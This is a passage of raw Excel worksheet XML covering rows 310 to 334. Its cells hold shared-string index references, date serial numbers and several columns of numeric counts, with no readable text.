      <c r="D310" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E310" s="95" t="s">
        <v>1141</v>
      </c>
      <c r="F310" s="42">
        <v>200</v>
      </c>
      <c r="G310" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H310" t="s">
        <v>1142</v>
      </c>
      <c r="I310" t="s">
        <v>103</v>
      </c>
      <c r="J310" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K310" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L310" t="s">
        <v>77</v>
      </c>
      <c r="M310" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P310" t="s">
        <v>246</v>
      </c>
      <c r="Q310" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W310" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="311" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A311" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B311" s="52">
        <v>44599.734224305554</v>
      </c>
      <c r="C311" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D311" s="96">
        <v>218</v>
      </c>
      <c r="E311" s="95" t="s">
        <v>1144</v>
      </c>
      <c r="F311" s="42">
        <v>104</v>
      </c>
      <c r="G311" s="95" t="s">
        <v>1145</v>
      </c>
      <c r="H311" t="s">
        <v>1146</v>
      </c>
      <c r="I311" t="s">
        <v>156</v>
      </c>
      <c r="J311" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K311" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L311" t="s">
        <v>77</v>
      </c>
      <c r="M311" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N311" t="s">
        <v>309</v>
      </c>
      <c r="Q311" s="95" t="s">
        <v>1147</v>
      </c>
      <c r="R311">
        <v>2979</v>
      </c>
      <c r="S311">
        <v>2786</v>
      </c>
      <c r="T311">
        <v>2423</v>
      </c>
      <c r="U311">
        <v>2122</v>
      </c>
      <c r="V311">
        <v>2379</v>
      </c>
      <c r="W311" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="312" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A312" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B312" s="52">
        <v>44126.670747928241</v>
      </c>
      <c r="C312" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D312" s="96">
        <v>110</v>
      </c>
      <c r="E312" s="95" t="s">
        <v>1148</v>
      </c>
      <c r="F312" s="42">
        <v>100</v>
      </c>
      <c r="G312" s="95" t="s">
        <v>1149</v>
      </c>
      <c r="H312" t="s">
        <v>1150</v>
      </c>
      <c r="I312" t="s">
        <v>156</v>
      </c>
      <c r="J312" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K312" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L312" t="s">
        <v>77</v>
      </c>
      <c r="M312" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N312" t="s">
        <v>309</v>
      </c>
      <c r="O312" s="95" t="s">
        <v>1151</v>
      </c>
      <c r="Q312" s="95" t="s">
        <v>1152</v>
      </c>
      <c r="R312">
        <v>20913</v>
      </c>
      <c r="S312">
        <v>228308</v>
      </c>
      <c r="T312">
        <v>269274</v>
      </c>
      <c r="U312">
        <v>665987</v>
      </c>
      <c r="V312">
        <v>613589</v>
      </c>
      <c r="W312" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="313" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A313" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B313" s="52">
        <v>44599.734224259257</v>
      </c>
      <c r="C313" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D313" s="96">
        <v>218</v>
      </c>
      <c r="E313" s="95" t="s">
        <v>1148</v>
      </c>
      <c r="F313" s="42">
        <v>216</v>
      </c>
      <c r="G313" s="95" t="s">
        <v>1149</v>
      </c>
      <c r="H313" t="s">
        <v>1153</v>
      </c>
      <c r="I313" t="s">
        <v>156</v>
      </c>
      <c r="J313" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K313" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L313" t="s">
        <v>77</v>
      </c>
      <c r="M313" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N313" t="s">
        <v>309</v>
      </c>
      <c r="O313" s="95" t="s">
        <v>1151</v>
      </c>
      <c r="Q313" s="95" t="s">
        <v>1147</v>
      </c>
      <c r="R313">
        <v>20913</v>
      </c>
      <c r="S313">
        <v>228308</v>
      </c>
      <c r="T313">
        <v>269274</v>
      </c>
      <c r="U313">
        <v>665987</v>
      </c>
      <c r="V313">
        <v>613589</v>
      </c>
      <c r="W313" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="314" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A314" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B314" s="52">
        <v>44152.496694965281</v>
      </c>
      <c r="C314" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D314" s="96">
        <v>110</v>
      </c>
      <c r="E314" s="95" t="s">
        <v>1154</v>
      </c>
      <c r="F314" s="42">
        <v>100</v>
      </c>
      <c r="G314" s="95" t="s">
        <v>1155</v>
      </c>
      <c r="H314" t="s">
        <v>1156</v>
      </c>
      <c r="I314" t="s">
        <v>156</v>
      </c>
      <c r="J314" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K314" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L314" t="s">
        <v>77</v>
      </c>
      <c r="M314" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N314" t="s">
        <v>309</v>
      </c>
      <c r="O314" s="95" t="s">
        <v>1157</v>
      </c>
      <c r="Q314" s="95" t="s">
        <v>1152</v>
      </c>
      <c r="R314">
        <v>111917</v>
      </c>
      <c r="S314">
        <v>142428</v>
      </c>
      <c r="T314">
        <v>111778</v>
      </c>
      <c r="U314">
        <v>126742</v>
      </c>
      <c r="V314">
        <v>134285</v>
      </c>
      <c r="W314" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="315" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A315" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B315" s="52">
        <v>44462.622378622684</v>
      </c>
      <c r="C315" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D315" s="96">
        <v>218</v>
      </c>
      <c r="E315" s="95" t="s">
        <v>1154</v>
      </c>
      <c r="F315" s="42">
        <v>105</v>
      </c>
      <c r="G315" s="95" t="s">
        <v>1155</v>
      </c>
      <c r="H315" t="s">
        <v>1156</v>
      </c>
      <c r="I315" t="s">
        <v>156</v>
      </c>
      <c r="J315" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K315" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L315" t="s">
        <v>77</v>
      </c>
      <c r="M315" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N315" t="s">
        <v>309</v>
      </c>
      <c r="O315" s="95" t="s">
        <v>1157</v>
      </c>
      <c r="Q315" s="95" t="s">
        <v>1147</v>
      </c>
      <c r="R315">
        <v>111917</v>
      </c>
      <c r="S315">
        <v>142428</v>
      </c>
      <c r="T315">
        <v>111778</v>
      </c>
      <c r="U315">
        <v>126742</v>
      </c>
      <c r="V315">
        <v>134285</v>
      </c>
      <c r="W315" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="316" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A316" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B316" s="52">
        <v>44462.622378657405</v>
      </c>
      <c r="C316" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D316" s="96">
        <v>218</v>
      </c>
      <c r="E316" s="95" t="s">
        <v>1158</v>
      </c>
      <c r="F316" s="42">
        <v>104</v>
      </c>
      <c r="G316" s="95" t="s">
        <v>1159</v>
      </c>
      <c r="H316" t="s">
        <v>1160</v>
      </c>
      <c r="I316" t="s">
        <v>156</v>
      </c>
      <c r="J316" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K316" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L316" t="s">
        <v>77</v>
      </c>
      <c r="M316" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N316" t="s">
        <v>309</v>
      </c>
      <c r="O316" s="95" t="s">
        <v>1161</v>
      </c>
      <c r="Q316" s="95" t="s">
        <v>1147</v>
      </c>
      <c r="R316">
        <v>2984</v>
      </c>
      <c r="S316">
        <v>2783</v>
      </c>
      <c r="T316">
        <v>2422</v>
      </c>
      <c r="U316">
        <v>2144</v>
      </c>
      <c r="V316">
        <v>3436</v>
      </c>
      <c r="W316" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="317" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A317" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B317" s="52">
        <v>44462.622378668981</v>
      </c>
      <c r="C317" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D317" s="96">
        <v>218</v>
      </c>
      <c r="E317" s="95" t="s">
        <v>1162</v>
      </c>
      <c r="F317" s="42">
        <v>102</v>
      </c>
      <c r="G317" s="95" t="s">
        <v>1163</v>
      </c>
      <c r="H317" t="s">
        <v>1164</v>
      </c>
      <c r="I317" t="s">
        <v>156</v>
      </c>
      <c r="J317" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K317" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L317" t="s">
        <v>77</v>
      </c>
      <c r="M317" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N317" t="s">
        <v>309</v>
      </c>
      <c r="O317" s="95" t="s">
        <v>1165</v>
      </c>
      <c r="Q317" s="95" t="s">
        <v>1147</v>
      </c>
      <c r="W317" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="318" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A318" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B318" s="52">
        <v>44599.734224282409</v>
      </c>
      <c r="C318" s="95" t="s">
        <v>1143</v>
      </c>
      <c r="D318" s="96">
        <v>218</v>
      </c>
      <c r="E318" s="95" t="s">
        <v>1166</v>
      </c>
      <c r="F318" s="42">
        <v>106</v>
      </c>
      <c r="G318" s="95" t="s">
        <v>1167</v>
      </c>
      <c r="H318" t="s">
        <v>1168</v>
      </c>
      <c r="I318" t="s">
        <v>156</v>
      </c>
      <c r="J318" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K318" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L318" t="s">
        <v>77</v>
      </c>
      <c r="M318" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N318" t="s">
        <v>309</v>
      </c>
      <c r="O318" s="95" t="s">
        <v>1157</v>
      </c>
      <c r="Q318" s="95" t="s">
        <v>1147</v>
      </c>
      <c r="R318">
        <v>3663</v>
      </c>
      <c r="S318">
        <v>8815</v>
      </c>
      <c r="T318">
        <v>7134</v>
      </c>
      <c r="U318">
        <v>6422</v>
      </c>
      <c r="V318">
        <v>2469</v>
      </c>
      <c r="W318" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="319" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A319" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B319" s="52">
        <v>43949.460110196756</v>
      </c>
      <c r="C319" s="95" t="s">
        <v>1169</v>
      </c>
      <c r="D319" s="96">
        <v>110</v>
      </c>
      <c r="E319" s="95" t="s">
        <v>1170</v>
      </c>
      <c r="F319" s="42">
        <v>100</v>
      </c>
      <c r="G319" s="95" t="s">
        <v>1171</v>
      </c>
      <c r="H319" t="s">
        <v>1172</v>
      </c>
      <c r="I319" t="s">
        <v>156</v>
      </c>
      <c r="J319" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K319" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L319" t="s">
        <v>77</v>
      </c>
      <c r="M319" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N319" t="s">
        <v>309</v>
      </c>
      <c r="O319" s="95" t="s">
        <v>1173</v>
      </c>
      <c r="P319" t="s">
        <v>1174</v>
      </c>
      <c r="Q319" s="95" t="s">
        <v>1175</v>
      </c>
      <c r="W319" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="320" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A320" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B320" s="52">
        <v>43984.606301539352</v>
      </c>
      <c r="C320" s="95" t="s">
        <v>1169</v>
      </c>
      <c r="D320" s="96">
        <v>110</v>
      </c>
      <c r="E320" s="95" t="s">
        <v>1176</v>
      </c>
      <c r="F320" s="42">
        <v>100</v>
      </c>
      <c r="G320" s="95" t="s">
        <v>1177</v>
      </c>
      <c r="H320" t="s">
        <v>1178</v>
      </c>
      <c r="I320" t="s">
        <v>156</v>
      </c>
      <c r="J320" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K320" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L320" t="s">
        <v>77</v>
      </c>
      <c r="M320" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N320" t="s">
        <v>309</v>
      </c>
      <c r="O320" s="95" t="s">
        <v>1179</v>
      </c>
      <c r="P320" t="s">
        <v>504</v>
      </c>
      <c r="Q320" s="95" t="s">
        <v>1175</v>
      </c>
      <c r="W320" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="321" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A321" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B321" s="52">
        <v>43984.606301516207</v>
      </c>
      <c r="C321" s="95" t="s">
        <v>1169</v>
      </c>
      <c r="D321" s="96">
        <v>110</v>
      </c>
      <c r="E321" s="95" t="s">
        <v>1180</v>
      </c>
      <c r="F321" s="42">
        <v>100</v>
      </c>
      <c r="G321" s="95" t="s">
        <v>1181</v>
      </c>
      <c r="H321" t="s">
        <v>1182</v>
      </c>
      <c r="I321" t="s">
        <v>156</v>
      </c>
      <c r="J321" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K321" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L321" t="s">
        <v>77</v>
      </c>
      <c r="M321" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N321" t="s">
        <v>309</v>
      </c>
      <c r="O321" s="95" t="s">
        <v>1151</v>
      </c>
      <c r="P321" t="s">
        <v>504</v>
      </c>
      <c r="Q321" s="95" t="s">
        <v>1175</v>
      </c>
      <c r="R321">
        <v>7141</v>
      </c>
      <c r="S321">
        <v>7231</v>
      </c>
      <c r="T321">
        <v>8824</v>
      </c>
      <c r="U321">
        <v>8983</v>
      </c>
      <c r="V321">
        <v>9468</v>
      </c>
      <c r="W321" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="322" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A322" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B322" s="52">
        <v>44399.427325983794</v>
      </c>
      <c r="C322" s="95" t="s">
        <v>1183</v>
      </c>
      <c r="D322" s="96">
        <v>101</v>
      </c>
      <c r="E322" s="95" t="s">
        <v>1184</v>
      </c>
      <c r="F322" s="42">
        <v>101</v>
      </c>
      <c r="G322" s="95" t="s">
        <v>1185</v>
      </c>
      <c r="H322" t="s">
        <v>1186</v>
      </c>
      <c r="I322" t="s">
        <v>203</v>
      </c>
      <c r="J322" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K322" s="95" t="s">
        <v>28</v>
      </c>
      <c r="L322" t="s">
        <v>83</v>
      </c>
      <c r="M322" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q322" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W322" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="323" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A323" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B323" s="52">
        <v>44594.610880381944</v>
      </c>
      <c r="C323" s="95" t="s">
        <v>1187</v>
      </c>
      <c r="D323" s="96">
        <v>101</v>
      </c>
      <c r="E323" s="95" t="s">
        <v>1188</v>
      </c>
      <c r="F323" s="42">
        <v>101</v>
      </c>
      <c r="G323" s="95" t="s">
        <v>1189</v>
      </c>
      <c r="H323" t="s">
        <v>1190</v>
      </c>
      <c r="I323" t="s">
        <v>179</v>
      </c>
      <c r="J323" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K323" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L323" t="s">
        <v>77</v>
      </c>
      <c r="M323" s="95" t="s">
        <v>1066</v>
      </c>
      <c r="Q323" s="95" t="s">
        <v>1191</v>
      </c>
      <c r="R323">
        <v>25</v>
      </c>
      <c r="S323">
        <v>7</v>
      </c>
      <c r="T323">
        <v>1</v>
      </c>
      <c r="W323" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="324" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A324" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B324" s="52">
        <v>44405.670701782408</v>
      </c>
      <c r="C324" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D324" s="96">
        <v>120</v>
      </c>
      <c r="E324" s="95" t="s">
        <v>1193</v>
      </c>
      <c r="F324" s="42">
        <v>120</v>
      </c>
      <c r="G324" s="95" t="s">
        <v>1194</v>
      </c>
      <c r="H324" t="s">
        <v>1074</v>
      </c>
      <c r="I324" t="s">
        <v>75</v>
      </c>
      <c r="J324" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K324" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L324" t="s">
        <v>77</v>
      </c>
      <c r="M324" s="95" t="s">
        <v>1195</v>
      </c>
      <c r="O324" s="95" t="s">
        <v>1196</v>
      </c>
      <c r="Q324" s="95" t="s">
        <v>1197</v>
      </c>
      <c r="R324">
        <v>15067</v>
      </c>
      <c r="S324">
        <v>13821</v>
      </c>
      <c r="T324">
        <v>12778</v>
      </c>
      <c r="U324">
        <v>12994</v>
      </c>
      <c r="V324">
        <v>13343</v>
      </c>
      <c r="W324" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="325" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A325" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B325" s="52">
        <v>44405.670701932868</v>
      </c>
      <c r="C325" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D325" s="96">
        <v>120</v>
      </c>
      <c r="E325" s="95" t="s">
        <v>1198</v>
      </c>
      <c r="F325" s="42">
        <v>100</v>
      </c>
      <c r="G325" s="95" t="s">
        <v>1199</v>
      </c>
      <c r="H325" t="s">
        <v>1200</v>
      </c>
      <c r="I325" t="s">
        <v>75</v>
      </c>
      <c r="J325" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K325" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L325" t="s">
        <v>77</v>
      </c>
      <c r="M325" s="95" t="s">
        <v>76</v>
      </c>
      <c r="O325" s="95" t="s">
        <v>1201</v>
      </c>
      <c r="Q325" s="95" t="s">
        <v>1197</v>
      </c>
      <c r="R325">
        <v>15064</v>
      </c>
      <c r="S325">
        <v>13821</v>
      </c>
      <c r="T325">
        <v>12772</v>
      </c>
      <c r="U325">
        <v>12993</v>
      </c>
      <c r="V325">
        <v>13357</v>
      </c>
      <c r="W325" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="326" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A326" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B326" s="52">
        <v>44405.670701817129</v>
      </c>
      <c r="C326" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D326" s="96">
        <v>120</v>
      </c>
      <c r="E326" s="95" t="s">
        <v>1202</v>
      </c>
      <c r="F326" s="42">
        <v>100</v>
      </c>
      <c r="G326" s="95" t="s">
        <v>1203</v>
      </c>
      <c r="H326" t="s">
        <v>1204</v>
      </c>
      <c r="I326" t="s">
        <v>75</v>
      </c>
      <c r="J326" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K326" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L326" t="s">
        <v>77</v>
      </c>
      <c r="M326" s="95" t="s">
        <v>76</v>
      </c>
      <c r="O326" s="95" t="s">
        <v>1205</v>
      </c>
      <c r="Q326" s="95" t="s">
        <v>1197</v>
      </c>
      <c r="R326">
        <v>15066</v>
      </c>
      <c r="S326">
        <v>13811</v>
      </c>
      <c r="T326">
        <v>12793</v>
      </c>
      <c r="U326">
        <v>12984</v>
      </c>
      <c r="V326">
        <v>13372</v>
      </c>
      <c r="W326" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="327" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A327" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B327" s="52">
        <v>44341.743694837962</v>
      </c>
      <c r="C327" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D327" s="96">
        <v>120</v>
      </c>
      <c r="E327" s="95" t="s">
        <v>1206</v>
      </c>
      <c r="F327" s="42">
        <v>100</v>
      </c>
      <c r="G327" s="95" t="s">
        <v>1207</v>
      </c>
      <c r="H327" t="s">
        <v>1074</v>
      </c>
      <c r="I327" t="s">
        <v>75</v>
      </c>
      <c r="J327" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K327" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L327" t="s">
        <v>77</v>
      </c>
      <c r="M327" s="95" t="s">
        <v>76</v>
      </c>
      <c r="O327" s="95" t="s">
        <v>1208</v>
      </c>
      <c r="Q327" s="95" t="s">
        <v>1197</v>
      </c>
      <c r="R327">
        <v>15062</v>
      </c>
      <c r="S327">
        <v>13823</v>
      </c>
      <c r="T327">
        <v>12776</v>
      </c>
      <c r="U327">
        <v>12982</v>
      </c>
      <c r="V327">
        <v>13376</v>
      </c>
      <c r="W327" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="328" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A328" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B328" s="52">
        <v>44131.418110219907</v>
      </c>
      <c r="C328" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D328" s="96">
        <v>113</v>
      </c>
      <c r="E328" s="95" t="s">
        <v>1209</v>
      </c>
      <c r="F328" s="42">
        <v>103</v>
      </c>
      <c r="G328" s="95" t="s">
        <v>1210</v>
      </c>
      <c r="H328" t="s">
        <v>1211</v>
      </c>
      <c r="I328" t="s">
        <v>103</v>
      </c>
      <c r="J328" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K328" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L328" t="s">
        <v>77</v>
      </c>
      <c r="M328" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O328" s="95" t="s">
        <v>1212</v>
      </c>
      <c r="Q328" s="95" t="s">
        <v>1213</v>
      </c>
      <c r="R328">
        <v>291</v>
      </c>
      <c r="S328">
        <v>237</v>
      </c>
      <c r="W328" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="329" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A329" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B329" s="52">
        <v>44405.670701736111</v>
      </c>
      <c r="C329" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D329" s="96">
        <v>120</v>
      </c>
      <c r="E329" s="95" t="s">
        <v>1214</v>
      </c>
      <c r="F329" s="42">
        <v>120</v>
      </c>
      <c r="G329" s="95" t="s">
        <v>1215</v>
      </c>
      <c r="H329" t="s">
        <v>1074</v>
      </c>
      <c r="I329" t="s">
        <v>75</v>
      </c>
      <c r="J329" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K329" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L329" t="s">
        <v>77</v>
      </c>
      <c r="Q329" s="95" t="s">
        <v>1197</v>
      </c>
      <c r="R329">
        <v>15066</v>
      </c>
      <c r="S329">
        <v>13821</v>
      </c>
      <c r="T329">
        <v>12769</v>
      </c>
      <c r="U329">
        <v>12984</v>
      </c>
      <c r="V329">
        <v>13338</v>
      </c>
      <c r="W329" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="330" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A330" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B330" s="52">
        <v>44005.711249849533</v>
      </c>
      <c r="C330" s="95" t="s">
        <v>1192</v>
      </c>
      <c r="D330" s="96">
        <v>113</v>
      </c>
      <c r="E330" s="95" t="s">
        <v>1216</v>
      </c>
      <c r="F330" s="42">
        <v>112</v>
      </c>
      <c r="G330" s="95" t="s">
        <v>1217</v>
      </c>
      <c r="H330" t="s">
        <v>1218</v>
      </c>
      <c r="I330" t="s">
        <v>103</v>
      </c>
      <c r="J330" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K330" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L330" t="s">
        <v>77</v>
      </c>
      <c r="M330" s="95" t="s">
        <v>104</v>
      </c>
      <c r="O330" s="95" t="s">
        <v>1219</v>
      </c>
      <c r="Q330" s="95" t="s">
        <v>1213</v>
      </c>
      <c r="W330" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="331" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A331" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B331" s="52">
        <v>44663.366533622684</v>
      </c>
      <c r="C331" s="95" t="s">
        <v>1220</v>
      </c>
      <c r="D331" s="96">
        <v>100</v>
      </c>
      <c r="E331" s="95" t="s">
        <v>1221</v>
      </c>
      <c r="F331" s="42">
        <v>100</v>
      </c>
      <c r="G331" s="95" t="s">
        <v>1222</v>
      </c>
      <c r="H331" t="s">
        <v>1223</v>
      </c>
      <c r="I331" t="s">
        <v>75</v>
      </c>
      <c r="J331" s="95" t="s">
        <v>454</v>
      </c>
      <c r="K331" s="95" t="s">
        <v>575</v>
      </c>
      <c r="L331" t="s">
        <v>77</v>
      </c>
      <c r="M331" s="95" t="s">
        <v>76</v>
      </c>
      <c r="Q331" s="95" t="s">
        <v>1224</v>
      </c>
      <c r="S331">
        <v>6</v>
      </c>
      <c r="W331" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="332" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A332" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B332" s="52">
        <v>44265.584430173614</v>
      </c>
      <c r="C332" s="95" t="s">
        <v>1225</v>
      </c>
      <c r="D332" s="96">
        <v>203</v>
      </c>
      <c r="E332" s="95" t="s">
        <v>1226</v>
      </c>
      <c r="F332" s="42">
        <v>203</v>
      </c>
      <c r="G332" s="95" t="s">
        <v>1227</v>
      </c>
      <c r="H332" t="s">
        <v>1228</v>
      </c>
      <c r="I332" t="s">
        <v>103</v>
      </c>
      <c r="J332" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K332" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L332" t="s">
        <v>83</v>
      </c>
      <c r="M332" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N332" t="s">
        <v>149</v>
      </c>
      <c r="O332" s="95" t="s">
        <v>1229</v>
      </c>
      <c r="Q332" s="95" t="s">
        <v>1230</v>
      </c>
      <c r="R332">
        <v>639145</v>
      </c>
      <c r="S332">
        <v>506982</v>
      </c>
      <c r="T332">
        <v>486266</v>
      </c>
      <c r="U332">
        <v>561137</v>
      </c>
      <c r="V332">
        <v>689546</v>
      </c>
      <c r="W332" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="333" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A333" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B333" s="52">
        <v>44048.487136076386</v>
      </c>
      <c r="C333" s="95" t="s">
        <v>1231</v>
      </c>
      <c r="D333" s="96">
        <v>101</v>
      </c>
      <c r="E333" s="95" t="s">
        <v>1232</v>
      </c>
      <c r="F333" s="42">
        <v>101</v>
      </c>
      <c r="G333" s="95" t="s">
        <v>1233</v>
      </c>
      <c r="H333" t="s">
        <v>1234</v>
      </c>
      <c r="I333" t="s">
        <v>172</v>
      </c>
      <c r="J333" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K333" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L333" t="s">
        <v>83</v>
      </c>
      <c r="M333" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O333" s="95" t="s">
        <v>1235</v>
      </c>
      <c r="P333" t="s">
        <v>951</v>
      </c>
      <c r="Q333" s="95" t="s">
        <v>1236</v>
      </c>
      <c r="R333">
        <v>26258</v>
      </c>
      <c r="S333">
        <v>18066</v>
      </c>
      <c r="T333">
        <v>117011</v>
      </c>
      <c r="U333">
        <v>183486</v>
      </c>
      <c r="V333">
        <v>177912</v>
      </c>
      <c r="W333" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="334" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A334" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B334" s="52">
        <v>44445.617869374997</v>
      </c>
      <c r="C334" s="95" t="s">
        <v>1237</v>
      </c>
      <c r="D334" s="96">
        <v>101</v>
      </c>
      <c r="E334" s="95" t="s">
        <v>1232</v>
      </c>
      <c r="F334" s="42">
        <v>101</v>
      </c>
      <c r="G334" s="95" t="s">
        <v>1233</v>
      </c>
      <c r="H334" t="s">
        <v>1234</v>
      </c>
      <c r="I334" t="s">
        <v>172</v>
      </c>
      <c r="J334" s="95" t="s">
        <v>1238</v>
      </c>
      <c r="K334" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L334" t="s">
        <v>83</v>
      </c>
      <c r="M334" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N334" t="s">
        <v>174</v>
      </c>
      <c r="O334" s="95" t="s">
        <v>1235</v>
      </c>
      <c r="Q334" s="95" t="s">
        <v>1239</v>
      </c>
      <c r="U334">
        <v>2</v>
      </c>
      <c r="V334">
        <v>2</v>
      </c>
